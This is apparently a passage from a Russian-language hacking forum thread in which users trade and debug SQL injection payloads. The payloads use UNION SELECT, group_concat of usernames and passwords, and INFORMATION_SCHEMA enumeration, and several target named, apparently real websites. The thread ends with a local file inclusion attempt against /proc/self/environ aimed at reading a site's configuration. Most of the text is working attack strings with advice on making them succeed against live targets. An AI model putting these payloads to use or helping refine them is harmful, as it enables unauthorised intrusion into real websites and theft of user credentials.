Данные не могу вывести, ХЗ в чём дело: Code: -1+UNION+SELECT+1,2,3,group_concat(username,0x3a,password),5,6,7,8+FROM+calendar_users+LIMIT+1,1+-- После этого проведения нет никаких ошибок, обычная страница с текстом. Что ещё можно сделать? ЗЫ: Code: -1 UNION SELECT 1,2,3, COLUMN_NAME,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0xblablabla LIMIT 0,100 --
Возможно вывод выпал в сорцы или в колонках пусто, либо данные начинаются не с первого поля. Попробуй ещё вывести без конкатенации.
На Limit не распространяется значение первого поля. Komyak, в предыдущем сообщение я же вам написал показать count(*).
Code: +and+1=0+union+select+1,CONCAT(CONCAT(count(*),username,CONCAT(count(*),password))),3,4,5,6,7,8+from+calendar_users limit+0,1-- Вывод делает: и все, больше ничего не получается извлечь.
Здравствуйте. Подскажите как раскручивать такую SQL inj http://www.vesti-moscow.ru/rnews.html?id=100114+order+by+13-- Но когда ввожу http://www.vesti-moscow.ru/rnews.html?id=100114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13-- Ошибка! 0_о
Там стоит Oracle http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,null+from+sys.dual
http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null+from+sys.dual http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,null+from+sys.dual Отличия видишь?
Здесь люди не экстрасенсы...попробуй 1+and+1=0+UNION+SELECT+1,2,3,unhex(hex(username)),5,6,7,8+FROM+calendar_users+LIMIT+0,1+--
Здравствуйте, как вывести названия таблиц, если через information_schema.tables не выводит, но известна БД (к примеру catalog) ? http://*/index.php?id=-5+union+select+1,2,,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19+--+ Версия-4.0.27-Max-log
http://realestatesky.net/index.php?option=com_propiedades&controller=../../../../../../../../../../../proc/self/environ%00 Почему не инклудит логи? И как можно прочитать конфиг?
